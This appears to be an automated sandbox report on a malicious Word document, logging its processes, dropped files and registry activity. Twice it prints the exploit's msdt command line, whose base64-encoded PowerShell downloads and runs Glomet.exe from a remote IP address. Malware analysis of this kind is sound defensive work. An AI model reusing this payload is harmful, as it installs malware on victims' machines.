Source: DiagPackage.dll.mui.13.dr Static PE information: No import functions for PE file found
Source: MsMpRes.dll.29.dr Static PE information: No import functions for PE file found
PE file contains strange resources
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll Jump to behavior
PE file contains more sections than normal
Source: libmpdec-2.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: 20220714 DWG.doc Virustotal: Detection: 8%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
Source: unknown Process created: C:\ProgramData\Glomet.exe "C:\programdata\Glomet.exe"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP" Jump to behavior
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32 Jump to behavior
Source: 20220714 DWG.doc.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\20220714 DWG.doc
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 29_2_004033B3
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{3A2858FD-E981-4180-86E7-4C2D0F3F33EC} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal72.expl.winDOC@20/52@0/2
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00402173 CoCreateInstance,MultiByteToWideChar, 29_2_00402173
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 29_2_00404766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\ProgramData\Glomet.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\Hypercenosis Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75" Jump to behavior
PE file contains sections with non-standard names
Source: libmpdec-2.dll.29.dr Static PE information: section name: .xdata
Binary contains a suspicious time stamp
Source: api-ms-win-core-timezone-l1-1-0.dll.29.dr Static PE information: 0xFC0D7D83 [Wed Jan 2 18:42:11 2104 UTC]
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
Drops PE files
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.mui Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.mui Jump to dropped file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
